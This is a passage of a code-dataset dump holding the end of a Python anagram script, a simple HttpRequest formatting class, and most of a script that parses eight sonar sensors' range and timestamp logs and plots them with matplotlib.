anags=detectAnagrams(toks)\n# printAnagrams(anags)\n# uncomment the following line to precompute from NLTK library\n# precomputeFromNLTK()\n loadNLTKAnagrams()\n anags=detectAnagrams(toks)\n printAnagrams(anags)\n# file=open(nltkAnagramsFile,\"r\")\n# line=file.readline()\n# print(filter(None,re.split('[^a-zA-Z0-9]', line)))\n print(\"Time taken for %d tokens: %s seconds\"%(len(toks),time.time()-starttime))\n","sub_path":"src/TextProcessor.py","file_name":"TextProcessor.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"454092965","text":"class HttpRequest:\n\n def __init__(self, host: str, port: int, type: str, path: str,\n headers: dict = None, data: str = None, version: str = 'HTTP/1.0'):\n if headers is None:\n headers = {}\n self.host = host\n self.port = port\n self.type = type\n self.path = path\n self.headers = headers\n self.data = data\n self.version = version\n\n def get_request_line(self):\n return f'{self.type} {self.path} {self.version}'\n\n def stringify_headers(self):\n return '\\r\\n'.join(f'{key}: {value}' for key, value in self.headers.items())\n\n def __repr__(self):\n build = [self.get_request_line()]\n\n if len(self.headers) != 0:\n build.append(self.stringify_headers())\n\n if self.data is not None:\n build.append('')\n build.append(self.data)\n\n return '\\r\\n'.join(build) + '\\r\\n\\r\\n'\n","sub_path":"assignment-3/tcp-protocol/src/httpclient/http/HttpRequest.py","file_name":"HttpRequest.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288531315","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport inspect\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport re\nimport sys\n\nSTART_MOVE_CONTINUE_NUM = 5\nEND_MOVE_CONTINUE_NUM = 5\n\n\ndef lineno():\n \"\"\"Returns the current line number in our program.\"\"\"\n return inspect.currentframe().f_back.f_lineno\n\ndef roundPartial(value, resolution):\n return round(value / resolution) * resolution\n\ndef loadradar(filename):\n # frame_num_0 = 0\n # frame_num_1 = 0\n # frame_num_2 = 0\n # frame_num_3 = 0\n # frame_num_4 = 0\n # frame_num_5 = 0\n # frame_num_6 = 0\n # frame_num_7 = 0\n cnt_ffff_0 = 0\n cnt_ffff_1 = 0\n cnt_ffff_2 = 0\n cnt_ffff_3 = 0\n cnt_ffff_4 = 0\n cnt_ffff_5 = 0\n cnt_ffff_6 = 0\n cnt_ffff_7 = 0\n ran_ori_0 = []\n ran_ori_1 = []\n ran_ori_2 = []\n ran_ori_3 = []\n ran_ori_4 = []\n ran_ori_5 = []\n ran_ori_6 = []\n ran_ori_7 = []\n range_0 = []\n range_1 = []\n range_2 = []\n range_3 = []\n range_4 = []\n range_5 = []\n range_6 = []\n range_7 = []\n last_timestamp_val_0 = -1.0\n last_timestamp_val_1 = -1.0\n last_timestamp_val_2 = -1.0\n last_timestamp_val_3 = -1.0\n last_timestamp_val_4 = -1.0\n last_timestamp_val_5 = -1.0\n last_timestamp_val_6 = -1.0\n last_timestamp_val_7 = -1.0\n timestamp_0 = []\n timestamp_1 = []\n timestamp_2 = []\n timestamp_3 = []\n timestamp_4 = []\n timestamp_5 = []\n timestamp_6 = []\n timestamp_7 = []\n linux_timestamp_0 = []\n sonar_IDs = [0, 1, 2, 3, 4, 5, 6, 7]\n with open(filename) as myfile:\n with open('filter_sonar.txt', 'w+') as filter_file:\n for line in myfile:\n line = line[:-1] # deletes extra line\n for aa in sonar_IDs:\n if re.search(\"sonar_obj\" + str(aa), line, re.IGNORECASE):\n name, var = line.partition(\"Range: \")[::2]\n range_item = var.split(\" \")[0]\n try:\n range_val = float(range_item)\n except:\n print(\"BAD range: \" + range_item + \" bad\")\n name, var = line.partition(\"timestamp: \")[::2]\n timestamp_item = var.split(\" \")[0]\n try:\n timestamp_val = float(timestamp_item)\n except:\n print(\"BAD timestamp: \" + timestamp_item + \" bad\")\n\n range_valid = False \n if range_val >= 0 and range_val < 60000:\n range_valid = True \n range_val = 0.001 * range_val\n\n if 0 == aa:\n diff_timestamp_0 = timestamp_val - last_timestamp_val_0\n if last_timestamp_val_0 >= 0.0 and 0 == diff_timestamp_0:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_0 = timestamp_val\n \n timestamp_0.append(timestamp_val)\n ran_ori_0.append(range_val)\n if range_valid:\n range_0.append(range_val)\n else:\n cnt_ffff_0 += 1\n elif 1 == aa:\n diff_timestamp_1 = timestamp_val - last_timestamp_val_1\n if last_timestamp_val_1 >= 0.0 and 0 == diff_timestamp_1:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_1 = timestamp_val\n\n timestamp_1.append(timestamp_val)\n ran_ori_1.append(range_val)\n if range_valid:\n range_1.append(range_val)\n else:\n cnt_ffff_1 += 1\n elif 2 == aa:\n diff_timestamp_2 = timestamp_val - last_timestamp_val_2\n if last_timestamp_val_2 >= 0.0 and 0 == diff_timestamp_2:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_2 = timestamp_val\n\n timestamp_2.append(timestamp_val)\n ran_ori_2.append(range_val)\n if range_valid:\n range_2.append(range_val)\n else:\n cnt_ffff_2 += 1\n elif 3 == aa:\n diff_timestamp_3 = timestamp_val - last_timestamp_val_3\n if last_timestamp_val_3 >= 0.0 and 0 == diff_timestamp_3:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_3 = timestamp_val\n\n timestamp_3.append(timestamp_val)\n ran_ori_3.append(range_val)\n if range_valid:\n range_3.append(range_val)\n else:\n cnt_ffff_3 += 1\n elif 4 == aa:\n diff_timestamp_4 = timestamp_val - last_timestamp_val_4\n if last_timestamp_val_4 >= 0.0 and 0 == diff_timestamp_4:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_4 = timestamp_val\n\n timestamp_4.append(timestamp_val)\n ran_ori_4.append(range_val)\n if range_valid:\n range_4.append(range_val)\n else:\n cnt_ffff_4 += 1\n elif 5 == aa:\n diff_timestamp_5 = timestamp_val - last_timestamp_val_5\n if last_timestamp_val_5 >= 0.0 and 0 == diff_timestamp_5:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_5 = timestamp_val\n\n timestamp_5.append(timestamp_val)\n ran_ori_5.append(range_val)\n if range_valid:\n range_5.append(range_val)\n else:\n cnt_ffff_5 += 1\n elif 6 == aa:\n diff_timestamp_6 = timestamp_val - last_timestamp_val_6\n if last_timestamp_val_6 >= 0.0 and 0 == diff_timestamp_6:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_6 = timestamp_val\n\n timestamp_6.append(timestamp_val)\n ran_ori_6.append(range_val)\n if range_valid:\n range_6.append(range_val)\n else:\n cnt_ffff_6 += 1\n elif 7 == aa:\n diff_timestamp_7 = timestamp_val - last_timestamp_val_7\n if last_timestamp_val_7 >= 0.0 and 0 == diff_timestamp_7:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_7 = timestamp_val\n\n timestamp_7.append(timestamp_val)\n ran_ori_7.append(range_val)\n if range_valid:\n range_7.append(range_val)\n else:\n cnt_ffff_7 += 1\n\n print(\"cnt_0: \" + str(cnt_ffff_0)\n + \"\\ncnt_1: \" + str(cnt_ffff_1)\n + \"\\ncnt_2: \" + str(cnt_ffff_2)\n + \"\\ncnt_3: \" + str(cnt_ffff_3)\n + \"\\ncnt_4: \" + str(cnt_ffff_4)\n + \"\\ncnt_5: \" + str(cnt_ffff_5)\n + \"\\ncnt_6: \" + str(cnt_ffff_6)\n + \"\\ncnt_7: \" + str(cnt_ffff_7)\n )\n return range_0, ran_ori_0, timestamp_0, range_1, ran_ori_1, timestamp_1, range_2, ran_ori_2, timestamp_2, range_3, ran_ori_3, timestamp_3, range_4, ran_ori_4, timestamp_4, range_5, ran_ori_5, timestamp_5, range_6, ran_ori_6, timestamp_6, range_7, ran_ori_7, timestamp_7\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n # frame_NO_0, range_0, timestamp_0, range_start_0, timestamp_start_0, range_end_0, timestamp_end_0, frame_NO_1, range_valid_1, timestamp_1, range_start_1, timestamp_start_1, range_end_1, timestamp_end_1 = loadradar(sys.argv[1])\n # frame_NO_0, range_0, timestamp_0 = loadradar(sys.argv[1])\n range_0, ran_ori_0, ts_0, range_1, ran_ori_1, ts_1, range_2, ran_ori_2, ts_2, range_3, ran_ori_3, ts_3, range_4, ran_ori_4, ts_4, range_5, ran_ori_5, ts_5, range_6, ran_ori_6, ts_6, range_7, ran_ori_7, ts_7 = loadradar(sys.argv[1])\n CNT_F_0 = len(ran_ori_0) - len(range_0)\n CNT_F_1 = len(ran_ori_1) - len(range_1)\n CNT_F_2 = len(ran_ori_2) - len(range_2)\n CNT_F_3 = len(ran_ori_3) - len(range_3)\n CNT_F_4 = len(ran_ori_4) - len(range_4)\n CNT_F_5 = len(ran_ori_5) - len(range_5)\n CNT_F_6 = len(ran_ori_6) - len(range_6)\n CNT_F_7 = len(ran_ori_7) - len(range_7)\n print(\"len_ran_ori_0: \" + str(len(ran_ori_0)) + \", len_ts_0: \" + str(len(ts_0)) + \", len_CNT_F_0: \" + str(CNT_F_0))\n print(\"len_ran_ori_1: \" + str(len(ran_ori_1)) + \", len_ts_1: \" + str(len(ts_1)) + \", len_CNT_F_1: \" + str(CNT_F_1))\n print(\"len_ran_ori_2: \" + str(len(ran_ori_2)) + \", len_ts_2: \" + str(len(ts_2)) + \", len_CNT_F_2: \" + str(CNT_F_2))\n print(\"len_ran_ori_3: \" + str(len(ran_ori_3)) + \", len_ts_3: \" + str(len(ts_3)) + \", len_CNT_F_3: \" + str(CNT_F_3))\n print(\"len_ran_ori_4: \" + str(len(ran_ori_4)) + \", len_ts_4: \" + str(len(ts_4)) + \", len_CNT_F_4: \" + str(CNT_F_4))\n print(\"len_ran_ori_5: \" + str(len(ran_ori_5)) + \", len_ts_5: \" + str(len(ts_5)) + \", len_CNT_F_5: \" + str(CNT_F_5))\n print(\"len_ran_ori_6: \" + str(len(ran_ori_6)) + \", len_ts_6: \" + str(len(ts_6)) + \", len_CNT_F_6: \" + str(CNT_F_6))\n print(\"len_ran_ori_7: \" + str(len(ran_ori_7)) + \", len_ts_7: \" + str(len(ts_7)) + \", len_CNT_F_7: \" + str(CNT_F_7))\n ## print(timestamp_0)\n dt_0 = np.diff(ts_0)\n dt_1 = np.diff(ts_1)\n dt_2 = np.diff(ts_2)\n dt_3 = np.diff(ts_3)\n dt_4 = np.diff(ts_4)\n dt_5 = np.diff(ts_5)\n dt_6 = np.diff(ts_6)\n dt_7 = np.diff(ts_7)\n print(\"dt_0_len: \" + str(len(dt_0)) + \"\\n\"\n + \"dt_1_len: \" + str(len(dt_1)) + \"\\n\"\n + \"dt_2_len: \" + str(len(dt_2)) + \"\\n\"\n + \"dt_3_len: \" + str(len(dt_3)) + \"\\n\"\n + \"dt_4_len: \" + str(len(dt_4)) + \"\\n\"\n + \"dt_5_len: \" + str(len(dt_5)) + \"\\n\"\n + \"dt_6_len: \" + str(len(dt_6)) + \"\\n\"\n + \"dt_7_len: \" + str(len(dt_7)) + \"\\n\"\n )\n duration_0 = ts_0[len(ts_0) - 1] - ts_0[0]\n min_0 = int(duration_0 / (1000 * 60))\n sec_0 = int((duration_0 - (min_0 * 1000 * 60)) / 1000)\n msec_0 = int((duration_0 - (min_0 * 1000 * 60)) % 1000)\n ## print(diff_time_0)\n figure1 = plt.figure(\"Sonar diff timestamp\")\n font = {'family': 'serif',\n 'color': 'blue',\n 'weight': 'normal',\n 'size': 16,\n }\n ax_dt_0 = figure1.add_subplot(4, 2, 1)\n ax_dt_0.plot(dt_0, '-b')\n curves = [\"sonar0\"]\n ax_dt_0.legend(curves, prop={'size':18})\n leg = ax_dt_0.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_0.text(0.5, 0.5, \"duration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\\n\", horizontalalignment='center', verticalalignment='center', transform=ax_dt_0.transAxes, fontdict=font)\n ax_dt_0.grid(True)\n ax_dt_1 = figure1.add_subplot(4, 2, 2)\n ax_dt_1.plot(dt_1, '-b')\n curves = [\"sonar1\"]\n ax_dt_1.legend(curves, prop={'size':18})\n leg = ax_dt_1.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_1.grid(True)\n ax_dt_2 = figure1.add_subplot(4, 2, 3)\n ax_dt_2.plot(dt_2, '-b')\n curves = [\"sonar2\"]\n ax_dt_2.legend(curves, prop={'size':18})\n leg = ax_dt_2.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_2.grid(True)\n ax_dt_3 = figure1.add_subplot(4, 2, 4)\n ax_dt_3.plot(dt_3, '-b')\n curves = [\"sonar3\"]\n ax_dt_3.legend(curves, prop={'size':18})\n leg = ax_dt_3.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_3.grid(True)\n ax_dt_4 = figure1.add_subplot(4, 2, 5)\n ax_dt_4.plot(dt_4, '-b')\n curves = [\"sonar4\"]\n ax_dt_4.legend(curves, prop={'size':18})\n leg = ax_dt_4.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_4.grid(True)\n ax_dt_5 = figure1.add_subplot(4, 2, 6)\n ax_dt_5.plot(dt_5, '-b')\n curves = [\"sonar5\"]\n ax_dt_5.legend(curves, prop={'size':18})\n leg = ax_dt_5.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_5.grid(True)\n ax_dt_6 = figure1.add_subplot(4, 2, 7)\n ax_dt_6.plot(dt_6, '-b')\n curves = [\"sonar6\"]\n ax_dt_6.legend(curves, prop={'size':18})\n leg = ax_dt_6.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_6.grid(True)\n ax_dt_7 = figure1.add_subplot(4, 2, 8)\n ax_dt_7.plot(dt_7, '-b')\n curves = [\"sonar7\"]\n ax_dt_7.legend(curves, prop={'size':18})\n leg = ax_dt_7.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_7.grid(True)\n # ax_1.text(0, 90, \"duration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\\n\", fontdict=font)\n # ax_1.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_0)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_0)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_0)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_0)), fontdict=font)\n # curves = [\"CHANNEL1 - ID0 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_1.get_legend()\n # leg.legendHandles[0].set_color('blue')\n # ax_2 = figure1.add_subplot(4, 2, 2)\n # ax_2.plot(diff_time_2, '-g')\n # ax_2.grid(True)\n # # ax_2.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_2.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_2)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_2)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_2)) + \"ms\", fontdict=font)\n # curves = [\"CHANNEL1 - ID2 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_2.get_legend()\n # leg.legendHandles[0].set_color('blue')\n # ax_3 = figure1.add_subplot(2, 2, 3)\n # ax_3.plot(diff_time_4, '-r')\n # ax_3.grid(True)\n # # ax_3.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_3.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_4)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_4)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_4)) + \"ms\\n\", fontdict=font)\n # curves = [\"CHANNEL1 - ID4 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_3.get_legend()\n # leg.legendHandles[0].set_color('blue')\n # ax_4 = figure1.add_subplot(2, 2, 4)\n # ax_4.plot(diff_time_6, '-m')\n # ax_4.grid(True)\n # print(\"len_Range: \" + str(len(range_0)) + \" len_diff_time: \" + str(len(diff_time_0)))\n # font = {'family': 'serif',\n # 'color': 'blue',\n # 'weight': 'normal',\n # 'size': 16,\n # }\n # # ax_4.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_4.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_6)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_6)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_6)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_6)), fontdict=font)\n # plt.ylabel('ID0 diff timestamp[milliseconds]', size=10)\n # plt.grid(True)\n figure2 = plt.figure(\"Sonar0/1/2/3 Range\")\n figure2.suptitle(\"Sonar0/1/2/3 Range Curve\\nduration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\", x=0.50, y=0.99, fontsize=24)\n font = {'family': 'serif',\n 'color': 'blue',\n 'weight': 'normal',\n 'size': 16,\n }\n ## ----------------BEGIN 0 -------------------- ##\n ax_ran_ori_0 = figure2.add_subplot(2, 4, 1)\n ax_ran_ori_0.plot(ran_ori_0, '-r')\n curves = [\"sonar0 - origin\"]\n ax_ran_ori_0.legend(curves, prop={'size':18})\n leg = ax_ran_ori_0.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_0):\n ax_ran_ori_0.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_0.transAxes, fontdict=font)\n else:\n ax_ran_ori_0.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_0)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_0)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_0)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_0.transAxes, fontdict=font)\n ax_ran_ori_0.grid(True)\n ## ************** ##\n ax_range_0 = figure2.add_subplot(2, 4, 5)\n ax_range_0.plot(range_0, '-r')\n curves = [\"sonar0 - no 65535\"]\n ax_range_0.legend(curves, prop={'size':18})\n leg = ax_range_0.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_0):\n ax_range_0.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_0.transAxes, fontdict=font)\n else:\n ax_range_0.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_0)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_0)) + \" max: \" + \"{0:.1f}\".format(np.max(range_0)), horizontalalignment='center', verticalalignment='center', transform=ax_range_0.transAxes, fontdict=font)\n ax_range_0.grid(True)\n ## ----------------END 0 --------------------- ##\n ## ----------------BEGIN 1 -------------------- ##\n ax_ran_ori_1 = figure2.add_subplot(2, 4, 2)\n ax_ran_ori_1.plot(ran_ori_1, '-r')\n curves = [\"sonar1 - origin\"]\n ax_ran_ori_1.legend(curves, prop={'size':18})\n leg = ax_ran_ori_1.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_1):\n ax_ran_ori_1.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_1.transAxes, fontdict=font)\n else:\n ax_ran_ori_1.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_1)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_1)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_1)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_1.transAxes, fontdict=font)\n ax_ran_ori_1.grid(True)\n ## ************** ##\n ax_range_1 = figure2.add_subplot(2, 4, 6)\n ax_range_1.plot(range_1, '-r')\n curves = [\"sonar1 - no 65535\"]\n ax_range_1.legend(curves, prop={'size':18})\n leg = ax_range_1.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_1):\n ax_range_1.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_1.transAxes, fontdict=font)\n else:\n ax_range_1.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(range_1)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_1)) + \" max: \" + \"{0:.1f}\".format(np.max(range_1)), horizontalalignment='center', verticalalignment='center', transform=ax_range_1.transAxes, fontdict=font)\n ax_range_1.grid(True)\n ## ----------------END 1 --------------------- ##\n ## ----------------BEGIN 2 --------------------- ##\n ax_ran_ori_2 = figure2.add_subplot(2, 4, 3)\n ax_ran_ori_2.plot(ran_ori_2, '-r')\n curves = [\"sonar2 - origin\"]\n ax_ran_ori_2.legend(curves, prop={'size':18})\n leg = ax_ran_ori_2.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_2):\n ax_ran_ori_2.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_2.transAxes, fontdict=font)\n else:\n ax_ran_ori_2.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_2)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_2)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_2)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_2.transAxes, fontdict=font)\n ax_ran_ori_2.grid(True)\n ## ************** ##\n ax_range_2 = figure2.add_subplot(2, 4, 7)\n ax_range_2.plot(range_2, '-r')\n curves = [\"sonar2 - no 65535\"]\n ax_range_2.legend(curves, prop={'size':18})\n leg = ax_range_2.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_2):\n ax_range_2.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_2.transAxes, fontdict=font)\n else:\n ax_range_2.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_2)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_2)) + \" max: \" + \"{0:.1f}\".format(np.max(range_2)), horizontalalignment='center', verticalalignment='center', transform=ax_range_2.transAxes, fontdict=font)\n ax_range_2.grid(True)\n ## ----------------END 2 --------------------- ##\n ## ----------------BEGIN 3 --------------------- ##\n ax_ran_ori_3 = figure2.add_subplot(2, 4, 4)\n ax_ran_ori_3.plot(ran_ori_3, '-r')\n curves = [\"sonar3 - origin\"]\n ax_ran_ori_3.legend(curves, prop={'size':18})\n leg = ax_ran_ori_3.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_3):\n ax_ran_ori_3.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_3.transAxes, fontdict=font)\n else:\n ax_ran_ori_3.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_3)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_3)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_3)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_3.transAxes, fontdict=font)\n ax_ran_ori_3.grid(True)\n ## ************** ##\n ax_range_3 = figure2.add_subplot(2, 4, 8)\n ax_range_3.plot(range_3, '-r')\n curves = [\"sonar3 - no 65535\"]\n ax_range_3.legend(curves, prop={'size':18})\n leg = ax_range_3.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_3):\n ax_range_3.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_3.transAxes, fontdict=font)\n else:\n ax_range_3.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(range_3)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_3)) + \" max: \" + \"{0:.1f}\".format(np.max(range_3)), horizontalalignment='center', verticalalignment='center', transform=ax_range_3.transAxes, fontdict=font)\n ax_range_3.grid(True)\n ## ----------------END 3 --------------------- ##\n ## =============================================================================================================================== ##\n figure3 = plt.figure(\"Sonar4/5/6/7 Range\")\n figure3.suptitle(\"Sonar4/5/6/7 Range Curve\\nduration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\", x=0.50, y=0.99, fontsize=24)\n font = {'family': 'serif',\n 'color': 'blue',\n 'weight': 'normal',\n 'size': 16,\n }\n ## ----------------BEGIN 4 -------------------- ##\n ax_ran_ori_4 = figure3.add_subplot(2, 4, 1)\n ax_ran_ori_4.plot(ran_ori_4, '-r')\n curves = [\"sonar4 - origin\"]\n ax_ran_ori_4.legend(curves, prop={'size':18})\n leg = ax_ran_ori_4.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_4):\n ax_ran_ori_4.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_4.transAxes, fontdict=font)\n else:\n ax_ran_ori_4.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_4)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_4)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_4)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_4.transAxes, fontdict=font)\n ax_ran_ori_4.grid(True)\n ## ************** ##\n ax_range_4 = figure3.add_subplot(2, 4, 5)\n ax_range_4.plot(range_4, '-r')\n curves = [\"sonar4 - no 65535\"]\n ax_range_4.legend(curves, prop={'size':18})\n leg = ax_range_4.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_4):\n ax_range_4.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_4.transAxes, fontdict=font)\n else:\n ax_range_4.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_4)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_4)) + \" max: \" + \"{0:.1f}\".format(np.max(range_4)), horizontalalignment='center', verticalalignment='center', transform=ax_range_4.transAxes, fontdict=font)\n ax_range_4.grid(True)\n ## ----------------END 4 --------------------- ##\n ## ----------------BEGIN 5 -------------------- ##\n ax_ran_ori_5 = figure3.add_subplot(2, 4, 2)\n ax_ran_ori_5.plot(ran_ori_5, '-r')\n curves = [\"sonar5 - origin\"]\n ax_ran_ori_5.legend(curves, prop={'size':18})\n leg = ax_ran_ori_5.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_5):\n ax_ran_ori_5.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_5.transAxes, fontdict=font)\n else:\n ax_ran_ori_5.text(0.5, 0.1, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_5)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_5)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_5)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_5.transAxes, fontdict=font)\n ax_ran_ori_5.grid(True)\n ## ************** ##\n ax_range_5 = figure3.add_subplot(2, 4, 6)\n ax_range_5.plot(range_5, '-r')\n curves = [\"sonar5 - no 65535\"]\n ax_range_5.legend(curves, prop={'size':18})\n leg = ax_range_5.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_5):\n ax_range_5.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_5.transAxes, fontdict=font)\n else:\n ax_range_5.text(0.5, 0.1, \"min: \" + \"{0:.1f}\".format(np.min(range_5)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_5)) + \" max: \" + \"{0:.1f}\".format(np.max(range_5)), horizontalalignment='center', verticalalignment='center', transform=ax_range_5.transAxes, fontdict=font)\n ax_range_5.grid(True)\n ## ----------------END 5 --------------------- ##\n ## ----------------BEGIN 6 -------------------- ##\n ax_ran_ori_6 = figure3.add_subplot(2, 4, 3)\n ax_ran_ori_6.plot(ran_ori_6, '-r')\n curves = [\"sonar6 - origin\"]\n ax_ran_ori_6.legend(curves, prop={'size':18})\n leg = ax_ran_ori_6.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_6):\n ax_ran_ori_6.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_6.transAxes, fontdict=font)\n else:\n 